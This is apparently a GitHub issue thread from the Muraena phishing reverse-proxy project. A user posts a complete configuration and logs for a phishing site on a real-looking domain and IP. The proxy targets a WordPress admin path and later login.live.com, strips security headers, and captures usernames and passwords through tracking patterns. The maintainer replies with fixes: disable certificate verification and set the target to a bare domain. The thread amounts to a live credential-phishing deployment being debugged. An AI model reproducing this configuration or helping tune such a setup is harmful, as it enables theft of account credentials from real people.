search

muraenateam / muraena

Muraena is an almost-transparent reverse proxy aimed at automating phishing and post-phishing activities.
https://muraena.phishing.click/
BSD 3-Clause "New" or "Revised" License
926 stars 172 forks source link

Setup successful - but having issued with TLS #76

Closed elite-user closed 2 years ago

elite-user commented 2 years ago

This is my config file

[proxy]

Phishing domain

phishing = "https://nyben.xyz"

# Target domain to proxy
destination = "https://knitsy.ddns.net/wp-admin"

# Listening IP address (IPv4 or IPv6)
# e.g. 0.0.0.0 or [::]
IP = "207.148.4.123"

# Listen announces on the local network address.
# The network must be "tcp", "tcp4", "tcp6"
listener = "tcp4"

# Listeninng TCP Port
port = 443

#
# Simple port forwarding used when the phishing site listen on a port different from target domain, such as:
# - test.muraena:8443
# - victim.site: 443
#
# port mapping can be configured as follow: ListeningPort:TargetPort
#portmapping = "443:31337"

# Force HTTP to HTTPS redirection
[proxy.HTTPtoHTTPS]
enabled = true
HTTPport = 80

#

Proxy's replacement rules

# [transform]

# List of content types to exclude from the transformation process
skipContentType = [ "font/*", "image/*" ]

# Enable transformation rules in base64 strings
[transform.base64]
enabled = false
padding = [ "=", "." ]

[transform.request]
    headers = [
        "Cookie",
        "Referer",
        "Origin",
        "X-Forwarded-For"
    ]

[transform.response]
    headers = [
        "Location",
        "WWW-Authenticate",
        "Origin",
        "Set-Cookie",
        "Access-Control-Allow-Origin"
    ]

    # Generic replacement rules:
    # it applies to body and any http header enabled for manipulation
    content = [
      [ "this is blue", "this is green" ]
    ]

#

Proxy's wiping rules

# [remove]

[remove.request]
    headers = [
        "X-Forwarded-For",
        #"User-Agent"
    ]

[remove.response]
    headers = [
        "Content-Security-Policy",
        "Content-Security-Policy-Report-Only",
        "Strict-Transport-Security",
        "X-XSS-Protection",
        "X-Content-Type-Options",
        "X-Frame-Options",
        "Referrer-Policy",
        "X-Forwarded-For"
    ]

#

Proxy's crafting rules

# [craft] [craft.add] [craft.add.request] [[craft.add.request.headers]]

name = "User-Agent"

            #value = "Ninja Agent"

     [craft.add.response]
         [[craft.add.response.headers]]

#

Rudimental redirection rules

# [[drop]] path = "/logout" redirectTo = "https://outlook.com"

[[drop]] path = "/signout" redirectTo = "https://outlook.com"

#

LOG

# [log] enabled = true filePath = "muraena.log"

#

DB (redis)

# [redis] host = "127.0.0.1" port = 6379 password = ""

#

TLS

# [tls] enabled = true

# Expand allows to replace the content of the certificate/key/root parameters to their content instead of the
# filepath
expand = false
certificate = "./config/cert.pem"
key = "./config/privkey.pem"
root = "./config/fullchain.pem"

#
# Danger zone, be careful editing these settings
#
# Minimum supported TLS version: SSL3.0, TLS1.0, TLS1.1, TLS1.2, TLS1.3
minVersion = "TLS1.2"
preferServerCipherSuites = true
sessionTicketsDisabled =  true
# InsecureSkipVerify controls whether muraena verifies the server's
# certificate chain and host name.
insecureSkipVerify = false

# RenegotiationSupport
# Note: renegotiation is not defined in TLS 1.3.
# Options:
# - Never (default):disables renegotiation
# - Once:           allows a remote server to request renegotiation once per connection.
# - Freely:         allows a remote server to repeatedly request renegotiation.
renegotiationSupport = "Never"

#

CRAWLER

# [crawler] enabled = false depth = 3 upto = 20 externalOriginPrefix = "www-" externalOrigins = [ "*.anotherdomain.site", "example.dev" ]

#

NECROBROWSER

# [necrobrowser] enabled = false endpoint = "http://necrobrowser.url/xyz" profile = "./config/instrument.necro"

[necrobrowser.keepalive]
    # GET on an authenticated endpoint to keep the session alive
    # every keepalive request is processed as its own necrotask
    enabled = false
    minutes = 5    # keeps alive the session every 5 minutes

[necrobrowser.trigger]
    type = "cookies"
    values = ["user_session", "dotcom_user"]  # values can be cookies names or relative paths
    delay = 5   # check every 5 seconds victim's cookie jar to see if we need to instrument something

#

STATIC SERVER

# [staticServer] enabled = false port = 8080 localPath = "./static/" urlPath = "/evilpath/"

#

WATCHDOG

# [watchdog] enabled = true

Monitor rules file changes and reload

dynamic = true
rules = "./config/watchdog.rules"
geoDB = "./config/GeoLite2-City.mmdb"

#

TRACKING

# [tracking] enabled = false

# Tracking types can be Path || Query (default)
#
# query:
#  ?identifier=trackingID
#
# path:
#   /trackingID
#
type = "query"

# Tracking identifier
identifier = "_gat"

# Rule to generate and validate a tracking identifier
regex = "[a-zA-Z0-9]{5}"

# Tracking initial HTTP Header (empty is: If-Range)
header = "X-If-Range"

# Landing HTTP Header (empty is: X-If-Landing-Redirect)
landing = "X-If-Landing-Redirect"

# Set speific victim's IP address
# ipSource = ""

# Set tracking cookie for a custom domain
# domain = ""

[tracking.urls]
credentials = [ "/session" ]
authSession = [ "/settings/profile" ]

[[tracking.patterns]]
label = "Username"
matching = "login"
start = "login="
end = "&password="

[[tracking.patterns]]
label = "Password"
matching = "password"
start = "password="
end = "&"

but anytime i run muraena with ./muraena -config config/config.toml i get this in my muraena.log

24 Mar 22 00:48 UTC inf watchdog Watchdog rules reloaded successfully 24 Mar 22 00:48 UTC inf Muraena is alive on 207.148.4.123:443 [ https://nyben.xyz ] ==> [ https://knitsy.ddns.net/wp-admin ] 24 Mar 22 00:49 UTC inf [172.98.33.85:24685] - [GET][https://nyben.xyz(https://nyben.xyz)/] 24 Mar 22 00:49 UTC err [errHandler] x509: certificate signed by unknown authority in request GET nyben.xyz/ 24 Mar 22 00:49 UTC inf [172.98.33.85:22355] - [GET][https://nyben.xyz(https://nyben.xyz)/favicon.ico] 24 Mar 22 00:49 UTC err [errHandler] x509: certificate signed by unknown authority in request GET nyben.xyz/favicon.ico 24 Mar 22 01:24 UTC inf watchdog Watchdog rules reloaded successfully 24 Mar 22 01:24 UTC inf Muraena is alive on 207.148.4.123:443 [ https://nyben.xyz ] ==> [ https://knitsy.ddns.net/wp-admin ] 24 Mar 22 01:24 UTC inf [45.132.115.182:31103] - [GET][https://nyben.xyz(https://nyben.xyz)/] 24 Mar 22 01:24 UTC err [errHandler] x509: certificate signed by unknown authority in request GET nyben.xyz/ 24 Mar 22 01:24 UTC inf [45.132.115.182:8615] - [GET][https://nyben.xyz(https://nyben.xyz)/favicon.ico] 24 Mar 22 01:24 UTC err [errHandler] x509: certificate signed by unknown authority in request GET nyben.xyz/favicon.ico 24 Mar 22 01:25 UTC inf Redirecting HTTP to HTTPS: https://207.148.4.123/ 24 Mar 22 01:25 UTC inf Redirecting HTTP to HTTPS: https://207.148.4.123/HNAP1/ 24 Mar 22 01:29 UTC inf [45.132.115.182:4561] - [GET][https://207.148.4.123(https://207.148.4.123)/] 24 Mar 22 01:29 UTC err [errHandler] x509: cannot validate certificate for 207.148.4.123 because it doesn't contain any IP SANs in request GET 207.148.4.123/ 24 Mar 22 01:29 UTC inf [45.132.115.182:4561] - [GET][https://207.148.4.123(https://207.148.4.123)/favicon.ico] 24 Mar 22 01:29 UTC err [errHandler] x509: cannot validate certificate for 207.148.4.123 because it doesn't contain any IP SANs in request GET 207.148.4.123/favicon.ico 24 Mar 22 08:19 UTC inf watchdog Watchdog rules reloaded successfully 24 Mar 22 08:19 UTC inf Muraena is alive on 207.148.4.123:443 [ https://nyben.xyz ] ==> [ https://login.live.com ] 24 Mar 22 08:25 UTC inf Redirecting HTTP to HTTPS: https://nyben.xyz/ 24 Mar 22 08:25 UTC inf Redirecting HTTP to HTTPS: https://nyben.xyz/ 24 Mar 22 08:25 UTC inf Redirecting HTTP to HTTPS: https://nyben.xyz/ 24 Mar 22 08:25 UTC inf Redirecting HTTP to HTTPS: https://nyben.xyz/ 24 Mar 22 08:34 UTC inf [45.132.115.229:24155] - [GET][https://nyben.xyz(https://nyben.xyz)/] 24 Mar 22 08:34 UTC err [errHandler] x509: certificate signed by unknown authority in request GET nyben.xyz/ 24 Mar 22 08:34 UTC inf [45.132.115.229:12701] - [GET][https://nyben.xyz(https://nyben.xyz)/favicon.ico] 24 Mar 22 08:34 UTC err [errHandler] x509: certificate signed by unknown authority in request GET nyben.xyz/favicon.ico 24 Mar 22 08:37 UTC inf Redirecting HTTP to HTTPS: https://207.148.4.123/hudson 24 Mar 22 08:47 UTC inf [176.53.219.141:40153] - [GET][https://nyben.xyz(https://nyben.xyz)/] 24 Mar 22 08:47 UTC err [errHandler] x509: certificate signed by unknown authority in request GET nyben.xyz/ 24 Mar 22 08:47 UTC inf [176.53.219.141:40153] - [GET][https://nyben.xyz(https://nyben.xyz)/favicon.ico] 24 Mar 22 08:47 UTC err [errHandler] x509: certificate signed by unknown authority in request GET nyben.xyz/favicon.ico 24 Mar 22 09:02 UTC inf Redirecting HTTP to HTTPS: https://nyben.xyz/ 24 Mar 22 09:06 UTC inf Redirecting HTTP to HTTPS: https://nyben.xyz/ 24 Mar 22 09:06 UTC err watchdog Blocked visitor [220.244.160.52/curl/7.79.1] 24 Mar 22 09:07 UTC inf Redirecting HTTP to HTTPS: https://nyben.xyz/ 24 Mar 22 09:07 UTC inf [52.23.95.110:45416] - [GET][https://nyben.xyz(https://nyben.xyz)/] 24 Mar 22 09:07 UTC err [errHandler] x509: certificate signed by unknown authority in request GET nyben.xyz/ 24 Mar 22 09:07 UTC inf Redirecting HTTP to HTTPS: https://nyben.xyz/ 24 Mar 22 09:07 UTC inf [18.206.128.24:50590] - [GET][https://nyben.xyz(https://nyben.xyz)/] 24 Mar 22 09:07 UTC err [errHandler] x509: certificate signed by unknown authority in request GET nyben.xyz/ 24 Mar 22 09:08 UTC inf Redirecting HTTP to HTTPS: https://nyben.xyz/ 24 Mar 22 09:08 UTC inf [38.202.2.157:59371] - [GET][https://nyben.xyz(https://nyben.xyz)/] 24 Mar 22 09:08 UTC err [errHandler] x509: certificate signed by unknown authority in request GET nyben.xyz/ 24 Mar 22 09:08 UTC inf [38.202.2.157:59371] - [GET][https://nyben.xyz(https://nyben.xyz)/favicon.ico] 24 Mar 22 09:08 UTC err [errHandler] x509: certificate signed by unknown authority in request GET nyben.xyz/favicon.ico 24 Mar 22 09:08 UTC inf Redirecting HTTP to HTTPS: https://nyben.xyz/ 24 Mar 22 09:08 UTC inf [64.120.29.201:55717] - [GET][https://nyben.xyz(https://nyben.xyz)/] 24 Mar 22 09:08 UTC err [errHandler] x509: certificate signed by unknown authority in request GET nyben.xyz/ 24 Mar 22 09:10 UTC inf Redirecting HTTP to HTTPS: https:/// 24 Mar 22 09:20 UTC inf Redirecting HTTP to HTTPS: https://www.nyben.xyz/ 24 Mar 22 09:38 UTC inf Redirecting HTTP to HTTPS: https://www.nyben.xyz/

ohpe commented 2 years ago

Try to set insecureSkipVerify = true in the TLS configuration file.

elite-user commented 2 years ago

I did this, and still having same issues @ohpe

ohpe commented 2 years ago

Check your configuration, the target is not well configured. You should define the domain only not the full URL.